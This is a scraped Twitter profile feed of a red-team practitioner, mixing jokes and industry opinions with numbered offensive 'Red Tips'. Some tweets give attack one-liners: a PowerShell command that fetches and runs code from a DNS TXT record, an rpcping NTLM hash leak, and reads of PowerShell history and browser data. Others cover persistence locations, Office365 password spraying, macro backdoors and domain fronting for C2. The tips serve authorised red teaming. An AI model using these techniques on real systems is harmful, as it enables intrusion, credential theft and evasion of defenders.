Vincent Yiu

@vysecurity

Followers
27,324
Following
204
Media
1,150
Statuses
32,127

Follow me for Cybersecurity #Thought #Leadership. Director Red Team. Help organizations safeguard their businesses from the bad guys.

Joined December 2014
Pinned Tweet
@vysecurity
Vincent Yiu
1 year
What on Earth do people do with 96GB RAM? Open like 32 instances of BloodHound neo4j databases?
225
40
556
@vysecurity
Vincent Yiu
6 years
Took all those "Red Team Tips" and stuck them onto one page: I'll update this page occasionally #redteam #adversarysimulation #cyber Also, I want to add that there's some duplicate numbering :( Ah well...
17
607
1K
@vysecurity
Vincent Yiu
3 years
Sent a PR to EDRs hook repository to visualize and quickly reference which APIs are hooked.
Tweet media one
11
312
851
@vysecurity
Vincent Yiu
2 months
The fuck, what kind of vulnerability is CVE-2023-24044? You can modify the host header so that it redirects to the attacker's domain instead. What is this bullshit? How did it even get a CVE?
67
100
849
@vysecurity
Vincent Yiu
2 years
What do people do with 64 GB RAM on a laptop?
764
32
788
@vysecurity
Vincent Yiu
7 years
Exploit CVE-2017-8759 without Macros or any interaction. Simply click on the infected file and boom code execution.
12
508
741
@vysecurity
Vincent Yiu
1 year
@stillgray Just floor him. Why’s the guy wasting time?
36
4
661
@vysecurity
Vincent Yiu
6 years
Red tip #333 : One liner to grab all cleartext WiFi passwords:
Tweet media one
10
266
657
@vysecurity
Vincent Yiu
1 year
Common persistence mechanisms for Linux:
- /etc/rc.local
- /etc/init.d/
- /etc/profile
- /etc/crontab
- /etc/cron.d/
- /etc/cron.hourly/
- /etc/cron.daily/
- /etc/cron.weekly/
- /etc/cron.monthly/
- /etc/cron.yearly/
- Startup Applications
- Systemd Services
- .bashrc
- .bash_profile
- .bash_logout
11
127
646
@vysecurity
Vincent Yiu
3 years
Red Tip #434 : SSH Agent Forwarding can be exploited to advance your presence on a network without SSH keys or passwords. @int0x08 has an example command snippet available at . Great for when you have a shell but no credentials. #redteam #cyber #sshagent
Tweet media one
6
169
568
@vysecurity
Vincent Yiu
2 years
When you need a calculator do you just type Python3?
93
26
560
@vysecurity
Vincent Yiu
1 year
Red Team 2.0 appears to become:
1) Give a machine on the internal network because the phish failed.
2) Disable EDR because can't seem to bypass the EDR.
3) Can't figure out how to pivot network segment.
4) ...
Dude, why not just ask to be put on the core banking system?
43
66
468
@vysecurity
Vincent Yiu
1 year
Common persistence mechanisms for Windows:
1. Registry
2. Startup folder
3. Group Policy Objects
4. Task Scheduler
5. Windows Services
6. Scheduled Tasks
7. AutoRun registry keys
8. Security Support Provider
9. Userinit registry key
10. AppInit registry key
9
99
453
@vysecurity
Vincent Yiu
3 years
Bypass Cloudflare using Workers: Technically, couldn't you now use this technique to scan tons of websites for exposed content to the CloudFlare CDN?
5
157
453
@vysecurity
Vincent Yiu
3 months
Alternatives to the Whoami.exe command:
echo %USERNAME%
echo %USERDOMAIN%
systeminfo
wmic ComputerSystem get Username
net user %username%
query user
cd /users; dir
reg query "hkcu\volatile environment"
6
87
442
@vysecurity
Vincent Yiu
1 year
@LisaMayOfficial @FightHaven The store lost $100 in cash when the man stole the $100 bill from the register. However, when the man used the stolen $100 bill to buy $70 worth of goods and received $30 in change, the store did not lose any additional money. So, the total amount the store lost was $100 due to…
61
2
415
@vysecurity
Vincent Yiu
5 years
Infosec tip: having the right Twitter feed saves you tens of thousands of USD in course fees. 😅
11
71
408
@vysecurity
Vincent Yiu
2 years
Life of a Red Teamer. Client: "Is it you? Did you guys run calculator?"
9
48
392
@vysecurity
Vincent Yiu
5 years
Red Tip #344 : Set HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0, to allow multiple sessions on a server per user. This is useful if you want to login to the jump-host, but that guy's just on all-day-long... 😶
5
131
394
@vysecurity
Vincent Yiu
3 years
Red Tip #429 : Looking for login credentials? Don't forget to try default credentials other than admin:admin -> . A fantastic cheat sheet containing major default credentials to try for various products. #redteam #cyber
2
135
388
@vysecurity
Vincent Yiu
10 months
@NoelleKos @PicturesFoIder New laptop New car New book New gold bars
7
1
365
@vysecurity
Vincent Yiu
1 year
Wtf… we’re screwed.
Tweet media one
Tweet media two
6
63
335
@vysecurity
Vincent Yiu
6 years
Hackers don't care about policies, or your compliance.
17
89
310
@vysecurity
Vincent Yiu
1 year
Why is Red Teaming so undervalued? Is it just me? Blue teams are implementing controls that don't work like 80% of the time for tens of millions of dollars. Yet most orgs are skimping out on paying for Red Team who's going to tell you what went wrong?
69
38
311
@vysecurity
Vincent Yiu
6 years
As some people are asking about Domain Fronting and how to find domains, here's a list I've made: and another post
1
157
309
@vysecurity
Vincent Yiu
9 months
Why I quit Bug Bounty and I'm constantly being reminded: Get paid fucking 10 USD for an Authentication Bypass + Remote Code Execution Chain, that can be used to attack their Domain Controllers.
20
17
307
@vysecurity
Vincent Yiu
5 years
Guess what, you know when you type 1 word into Chrome, and it goes off on a search? Windows also makes a NBNS + LLMNR request for that 1 word. Great.
Tweet media one
Tweet media two
8
127
299
@vysecurity
Vincent Yiu
6 years
has tons of domain data for your pentesting needs :)
5
105
296
@vysecurity
Vincent Yiu
3 years
Pretty cool Red Team game:
Tweet media one
7
77
302
@vysecurity
Vincent Yiu
3 years
Red Tip #437 : Pwndrop is a customized web and webdav server that can be used to serve documents and payloads with a few extra features. @kgretzky made a fantastic GUI and it's super easy to use! . Video at #redteam #cybersecurity
Tweet media one
5
77
295
@vysecurity
Vincent Yiu
5 years
Oh oh... oh...
8
125
293
@vysecurity
Vincent Yiu
3 years
YOLO, I joined Cyber not even knowing how the TCP stack really worked, or how IP Networking worked. University was all text books. OSCP just pushed me into more practical execution and understanding through testing / trial and error.
13
21
291
@vysecurity
Vincent Yiu
5 years
Red Tip #345 : When placing Excel Macro backdoors into Excel startup, you don't have to name it Personal.xlsb, you can also call it a.txt. It'll still start up upon opening of Excel. 😊... Bonus point for sticking it into Roaming profile.
Tweet media one
2
96
293
@vysecurity
Vincent Yiu
1 year
Trick to use any Cloudflare website to get your egress IP. Access the https://<website>/cdn-cgi/trace, and grep "ip".
4
54
290
@vysecurity
Vincent Yiu
5 years
Domain Fronting using via. method over DNS over HTTPS.
Tweet media one
3
118
286
@vysecurity
Vincent Yiu
4 years
Red Team: Shad0w, a post-exploitation framework designed to operate covertly on heavily monitored environments.
3
112
283
@vysecurity
Vincent Yiu
5 years
:D Who's interested in a way to get a shell once you have the target's low privileged Office365 credentials?
29
50
278
@vysecurity
Vincent Yiu
2 years
Table top scenario: There’s a breach and 30 employees got phished. All SOC AD accounts are locked out and we can’t get back in.
69
39
273
@vysecurity
Vincent Yiu
5 years
type C:\users\%username%\appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
8
72
269
@vysecurity
Vincent Yiu
8 months
DevTunnels, blue are going to begin searching for . Get ready ahead of time and use domains like: global.rel.tunnels.api.visualstudio\.com tunnels-prod-rel-tm.trafficmanager\.net *.app\.github.dev
6
91
269
@vysecurity
Vincent Yiu
3 years
In case you need a quick Macro string obfuscation:
Tweet media one
4
60
260
@vysecurity
Vincent Yiu
3 years
Neat command from Ippsec :D find / -newermt "2021-02-12" -newermt "2021-02-19" -ls| grep -v ' /etc\| /var/lib\| /sys\| /proc\| /boot' It finds files from when a box was created then finds stuff the author of a box planted for the CTF :D
Tweet media one
5
54
258
@vysecurity
Vincent Yiu
5 years
If you wanted to extract ATT&CK Threat groups to Techniques, this script I mashed together works great for getting it into CSV before Matrixing:
2
81
254
@vysecurity
Vincent Yiu
3 years
Red Tip #427 : Directory discovery for all your URLs in one command, formatted to a nice HTML file for browsing. You can try other formats for grepping etc. ffuf -w targets-alive.txt:URL -w wordlist.txt -u URL/FUZZ -mc 200,403 -o targets-report.html -of html #recon #cyber
Tweet media one
3
67
250
@vysecurity
Vincent Yiu
4 years
Red Tip #425 : CVE-2020-16938 allows privileged file read by EVERYBODY according to @jonasLyk You can PoC using 7zip and navigating to the device path \\.\PhysicalDevice0\Basic data partition.img\Windows\System32\Config\ #redteam #cyber
Tweet media one
1
92
250
@vysecurity
Vincent Yiu
3 years
Red Team Tip? Need random IP addresses to do something quick? has you covered.
7
58
251
@vysecurity
Vincent Yiu
3 years
Imagine trying to detect LOLBINs, then your sysadmins are like sticking commands like this into LOGON scripts.
Tweet media one
11
55
252
@vysecurity
Vincent Yiu
6 years
Red tip #325 : WPA2 PSK can be cracked on Hashcat too, just in case you were not aware. All you do is make cap2hccapx then convert the handshake CAP file to HCCAPX then crack it in Hashcat mode 2500 :)
6
102
249
@vysecurity
Vincent Yiu
5 years
Red Tip #337 : Have a low privileged Office365 account? Pivot over to after logging in and you can access the Azure AD. If they're syncing AD you suddenly get to view all the groups. Also check out Azure CLI. From @ustayready 's @WWHackinFest talk!
1
110
243
@vysecurity
Vincent Yiu
6 years
Red tip #303 : Look for open S3 buckets using I found 1400 buckets in about 1 hour. Good practice to make sure your client isn't vulnerable to such attacks, and if in a red team you might be able to use it to serve payload stages or create waterhole attacks.
3
120
239
@vysecurity
Vincent Yiu
3 years
Red Tip #435 : Found GitLab but no credentials? That pesky sign-in page is blocking you off? Try navigating to /explore or /explore/snippets to see if there's anything useful. #Redteam #GitLabSnippets
Tweet media one
2
62
240
@vysecurity
Vincent Yiu
5 years
What's the best UAC bypass to use now?
15
51
235
@vysecurity
Vincent Yiu
4 years
Red Tip #421 : Do you know how to trivially & remotely hijack an #RDP session without prompt nor warning on user’s side using #Microsoft signed binary (no patch/multi-session) ? qwinsta+mstsc shadowing is the answer ;) Details: @kmkz_security
2
74
238
@vysecurity
Vincent Yiu
5 years
Red Tip #343 : When working with Google Drive documents, if it asks you to request permission, you can try. However, you can also try sticking /pubhtml at the end to see if they've published a copy that you can view.
2
68
231
@vysecurity
Vincent Yiu
3 years
Red Tip #436 : ProjectDiscovery have a tool called Nuclei which has constantly community-updated signatures which help to quickly identify the low hanging fruit and fingerprint a perimeter if you don't want to go full on vulnerability scanner: #cyber
Tweet media one
2
38
230
@vysecurity
Vincent Yiu
4 years
Red Tip #415 : STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use "smbpasswd -r domain.fqdn -U username" to change the password so you can use the account. #cyber #redteam
Tweet media one
0
79
229
@vysecurity
Vincent Yiu
2 years
Just saw the 50th company running: subfinder -d $1 | httpx | gospider | nuclei. Calls it AI, next gen.
13
18
220
@vysecurity
Vincent Yiu
6 years
Red tip #328 : Need to Spray Office365? Use . Tried and tested this tool and works really fast and well in Python. Just do --threads 3000 and --password Welcome1. As all operators know, you don't have time to be testing tools in the middle of a gig. :)
0
78
220
@vysecurity
Vincent Yiu
2 years
Red Team. Do you invite the target out for coffee?
46
11
217
@vysecurity
Vincent Yiu
3 years
Red / Blue Team Tip: If you're still reading e-mail message headers using Notepad, you're doing it wrong. Check out Message Header Analyzer: It'll save your eyes 🤯 #cyber #redteam #blueteam #suspiciousemails
12
51
218
@vysecurity
Vincent Yiu
6 years
Getting started with Threat Hunting:
1) Install Splunk
2) Sysmon all the endpoints using GPO
3) Send all logs to Splunk using Sysmon TA
4) Run saved queries :D
13
64
212
@vysecurity
Vincent Yiu
6 years
I just published “DomLink — Automating domain discovery”
6
112
206
@vysecurity
Vincent Yiu
4 years
Red Tip #423 : Escalate privileges on a Windows system if you have any of the following privileges. SeImpersonate, SeAssignPrimary, SeTcb, SeBackup, SeRestore, SeCreateToken, SeLoadDriver, SeTakeOwnership, SeDebug @elc0rr3Km1n0s #cyber #redteam
1
50
208
@vysecurity
Vincent Yiu
7 years
This is just awesome. Nice work guys.
6
127
205
@vysecurity
Vincent Yiu
3 years
Ransomware defense. Every EDR company telling people to install EDR but in reality their EDR probably won’t even detect AnyDesk. You should be red teaming instead.
21
29
198
@vysecurity
Vincent Yiu
4 years
Red Tip #402 : Need to proxy Linux tools? Proxychains4. Need to proxy Windows tools like ADExplorer or Remote Desktop? Try out Proxycap, Proxifier. #cyber #operations #redteam
Tweet media one
4
77
201
@vysecurity
Vincent Yiu
4 years
Neat trick with Windows when you want to leave SSH tunnels in the background.
# bash
# screen -S tunnel
# ssh -L 8080:localhost:8080
Close terminal. Stays running :)
7
62
196
@vysecurity
Vincent Yiu
4 years
1. The cloud is just someone else’s computer. 2. When that someone tells you they can’t view your data, all they mean is they have a rule to say they shouldn’t. Rarely a technical control to prevent it.
8
54
191
@vysecurity
Vincent Yiu
4 years
Red Tip #404 : Perform an easy phishing campaign and obtain a list of users who clicked. Send a follow-up email from a training platform and ask them to perform their awareness training by launching an application. The idea is that multi-stage phishing is more convincing. #cyber #redteam
Tweet media one
2
55
188
@vysecurity
Vincent Yiu
3 years
Using CloudFlare for IP address filtering in Red Team Operations: Wrote it up for reference, and because CloudFlare is pretty awesome. You can also play around with the other features! 🔥 (cc @curi0usjack , @shantanukhande ) #redteam #cybersecurity
Tweet media one
4
81
188
@vysecurity
Vincent Yiu
6 years
Red tip #320 : List Chrome bookmarks with one line: type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type" Thank @francisacer1 for the path to Bookmarks.bak :D
2
56
187
@vysecurity
Vincent Yiu
6 years
Red tip #310 : SOC is looking for low user/access count new domains that haven't been seen before and you can't domain front due to RFC2616 proxy? When doing the phish, add invisible image links to your C2 domain so that multiple users will have loaded the C2 domain before use.
4
64
187
@vysecurity
Vincent Yiu
4 years
Red Tip #422 : Identify if a certain domain is hosted on s3 bucket by requesting ‘/%C0’. It’ll spit out a 400 bad request if it’s an S3 bucket with a similar message as shown in the screenshot. #redteam #cyber
Tweet media one
5
48
187
@vysecurity
Vincent Yiu
6 years
CVE-2018-8120 Windows LPE PoC
0
105
183
@vysecurity
Vincent Yiu
6 years
Just in case you need to leak a hash over a port other than TCP 445 you have "rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM"
0
77
176
@vysecurity
Vincent Yiu
6 years
Red tip #282 : Although I thought it was clear, as Microsoft documented it, LAPS passwords are in clear text to users that have the right privileges in AD. Friendly reminder :) Either just browse LDAP or or @harmj0y @kfosaaen
4
76
180
@vysecurity
Vincent Yiu
5 years
A new update to the ATT&CK Group to Technique repository! @msgeekuk has given us a lot of fancy changes in the Spreadsheet, and we also have color coding. Get the repository at
Tweet media one
Tweet media two
Tweet media three
4
79
178
@vysecurity
Vincent Yiu
5 years
OK, best payload initiation vectors. Eg. DOC Macro, Excel Macro, HTA, VBS, JS, SLK, What else...?
23
41
177
@vysecurity
Vincent Yiu
6 years
I've got to say but one of my favourite commands to date is: powershell Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName DCNAME
5
46
176
@vysecurity
Vincent Yiu
5 years
[NEW POST] HAMMERTHROW: Rotate my domain. Automating the process of changing staging and beacon domains in @armitagehacker 's CobaltStrike. This makes it more difficult for defenders to detect all domains in use. #redteam
3
103
172
@vysecurity
Vincent Yiu
6 years
Red tip #274 : Password cracking is hard. I love Top297Million-Probable, rockyou was decent for a quick smash, but lately found out about Keyboard Walks. Add keyboard walks with rules into your cracking routines to get more hashes cracked! Share your ideas!
7
70
171
@vysecurity
Vincent Yiu
3 years
Given the feedback from some of the companies who run the products on the list, here’s a revamped version without certain products. Let’s hope everyone can learn to maximise coverage using multiple products or understand the scope of their EDR’s coverage. Cc @MrUn1k0d3r #redteam
Tweet media one
5
76
172
@vysecurity
Vincent Yiu
6 years
How do you prevent a zero day exploit attack? You don't. You block the next step of the attack to minimise the impact of the zero day. If you have many layers of controls, it minimises the impact of the zero day. Good network segmentation and endpoint / server controls etc.
4
76
168
@vysecurity
Vincent Yiu
3 years
Send phish to 10 companies, get 30 shells, 7 minutes in. Shell overload is a big problem. Why’s no one talked about shell overload problems?
13
15
165
@vysecurity
Vincent Yiu
6 years
Red tip #284 : Windows Credential Vault is often used to store saved passwords. @_rastamouse walks us through the decryption procedures required to make use of these credentials in his blog post at !
2
76
165
@vysecurity
Vincent Yiu
6 years
[NEW POST] For the #RedTeam who use CloudFront for Domain Fronting. Similar to Aliyun, set arbitrary host headers :) Check this out. As always, I confirm any techniques and findings using @armitagehacker Cobalt Strike. cc @bluscreenofjeff @001spartan
4
74
163
@vysecurity
Vincent Yiu
7 years
No need for IEX cc @MDSecLabs : powershell -ep bypass -nop -c "powershell . ((nslookup.exe -q=txt ))[5]"
5
99
161
@vysecurity
Vincent Yiu
6 years
Red tip #315 : If you HAVE to spray for creds, use Kerberos spraying, as pointed out by @ropnop: the level of auditing is far less by default and it does not log invalid attempts.
1
58
160
@vysecurity
Vincent Yiu
3 years
Why I see myself as a hacker more than a developer. Part 1. 1) I write code that barely works, not factored, not optimized. 2) I write obfuscation better than I write code. 3) I still can't get a proper UI going. 4) My code achieves the task, only.
8
20
160
@vysecurity
Vincent Yiu
6 years
Red tip #321 : Want to find out if the current network has an external exposed interface? Eg. Wireless networks? An easy way is to visit on port 22,80,443 for a quick idea. You might find that your current network has another way in!
4
57
157
@vysecurity
Vincent Yiu
3 years
Is it wrong to be passionate about cyber security?
17
7
148
@vysecurity
Vincent Yiu
6 years
New blog post on using Alibaba CDN for domain fronting, and some of its benefits. #redteam #security My examples use @armitagehacker 's Cobalt Strike, but you can use any other C2 software.
1
85
148